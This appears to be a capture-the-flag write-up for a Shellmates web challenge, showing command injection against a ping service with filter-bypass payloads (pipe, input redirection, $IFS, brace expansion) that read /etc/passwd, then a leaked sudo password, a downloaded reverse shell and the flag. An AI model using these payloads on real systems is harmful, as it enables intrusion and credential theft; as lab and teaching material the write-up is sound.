@Fa2y
Created April 13, 2020 13:36
A writeup for the web CTF challenge by shellmates: command injection, then a privesc.

Writeup Web Shellmates

At first glance the application was running the command "ping -c 1 $arg"; you can tell that from the output of the command and from the "Ping Service" page title. So my first try was command injection with ";id", since a semicolon is a command separator, and I got "okay boomer" XD. So there was some kind of filter. Then I tried the pipe "|": it also acts as a command separator (it feeds the stdout of the previous command into the stdin of the next one, but we only need it as a separator). I tried "|cat /etc/passwd" to see which users are available, but got "okay boomer" again, so we know it's filtering spaces as well as semicolons. Then I tried "|cat</etc/passwd" (input redirection, so no space is needed) and it worked:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
.
ctf:x:1000:1000::/home/ctf:/bin/bash

Awesome! Then I took a look at the content of index.php to see how the filter really works, and I found this:

if (preg_match('/^(.*)[\s;](.*)$/', "$ip")) {echo 'Okay BOOMER';}
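To see exactly what that regex blocks and what it lets through, here is an added example (my own code, not part of the original writeup or of the challenge): the filter re-implemented in Python and run against the payloads used in this writeup, next to the strict check the service should have done instead. The payload labels and the 127.0.0.1 target are my own assumptions; PCRE and Python's re agree on \s, '.', '^' and '$' for these inputs, so the verdicts match the PHP filter.

```python
import ipaddress
import re
import shlex

# Re-implementation of the filter found in the challenge's index.php:
#   preg_match('/^(.*)[\s;](.*)$/', $ip)
# It fires on any whitespace character (\s: space, tab, newline, ...) or ';'
# anywhere in the argument. Note that '|', '<', '$' and '{' are not in the class.
FILTER = re.compile(r"^(.*)[\s;](.*)$")


def filter_blocks(arg: str) -> bool:
    """True when the challenge's regex would print 'Okay BOOMER' instead of pinging."""
    return FILTER.search(arg) is not None


# Constructed payloads; the target address is an assumption. '|' is never
# filtered, so it is used as the command separator in every injection.
PAYLOADS = {
    "semicolon":    "127.0.0.1;id",                     # ';' is in the class
    "pipe + space": "127.0.0.1|cat /etc/passwd",        # space is \s
    "tab":          "127.0.0.1|cat\t/etc/passwd",       # tab is \s too
    "newline":      "127.0.0.1|cat\n/etc/passwd",       # newline is \s too
    "redirect":     "127.0.0.1|cat</etc/passwd",        # no separator needed
    "brace expand": "127.0.0.1|{cat,/etc/passwd}",      # bash-only: {cmd,arg}
    "IFS":          "127.0.0.1|cat${IFS}/etc/passwd",   # works in sh and bash
}


def classify(payloads=PAYLOADS) -> dict:
    """Map each payload name to 'blocked' or 'passes' under the challenge filter."""
    return {name: ("blocked" if filter_blocks(p) else "passes")
            for name, p in payloads.items()}


def is_valid_target(ip: str) -> bool:
    """Allow-list check: the argument must parse as a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(ip)
        return True
    except ValueError:
        return False


def safe_ping_command(ip: str) -> str:
    """Hardened version of the service: validate the value, then quote it anyway
    (shlex.quote is the Python equivalent of PHP's escapeshellarg)."""
    if not is_valid_target(ip):
        raise ValueError(f"not an IP address: {ip!r}")
    return f"ping -c 1 {shlex.quote(str(ipaddress.ip_address(ip)))}"


if __name__ == "__main__":
    for name, verdict in classify().items():
        print(f"{name:13s} {verdict:8s} {PAYLOADS[name]!r}")
    print(safe_ping_command("127.0.0.1"))
```

The takeaway is that a deny-list regex only removes the separators the author thought of: every payload that the ls and cat steps of this writeup rely on passes it unchanged. An allow-list (parse as an IP, or better, never hand user input to a shell at all) rejects all of them.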

The regular expression matches any occurrence of a separator: whitespace (\s covers spaces, tabs, newlines, ...) as well as semicolons. So how can we pass arguments to a command without using a single space? Hmm, we can use the environment variable "$IFS" (Internal Field Separator), which contains a space by default, e.g. cat${IFS}/etc/passwd. There's another trick: bash brace expansion, {cmd,args}, for example {cat,/etc/passwd}, which the shell expands to "cat /etc/passwd"; that worked too. Keep in mind that brace expansion is a bash feature and not POSIX sh, while the $IFS trick works in both. You can check more tricks in the PayloadsAllTheThings repo under Command Injection; it's legend... dary. The challenge description mentioned that the flag is at /home/ctf/flag.txt, so I checked the permissions on it:

-r-------- 1 ctf ctf 46 Apr 9 09:51 flag.txt

Apparently it's owned by the user ctf and not readable by us (the web server user). Doing a light recon, we can see that the ctf user used "sudo -S" and that the plaintext password "Qu4r4Nt1n3d!@" is sitting in its .bash_history file. But we can't feed the password to sudo or su through the web app's command injection (su needs a terminal), so we need an interactive shell.

I hosted a Python reverse shell, since the box has python ("which python" confirms it), and downloaded it into /tmp on the challenge box.

I did port tunnelling with ngrok because it's the simplest option, popped a shell, switched user with "su ctf" and the password above, and then read /home/ctf/flag.txt:

shellmates{b3_c4r3FuL_w1t|-|_CMD_1nj3ct1i0N!}

Thanks to shellmates and the challenge creator(s).
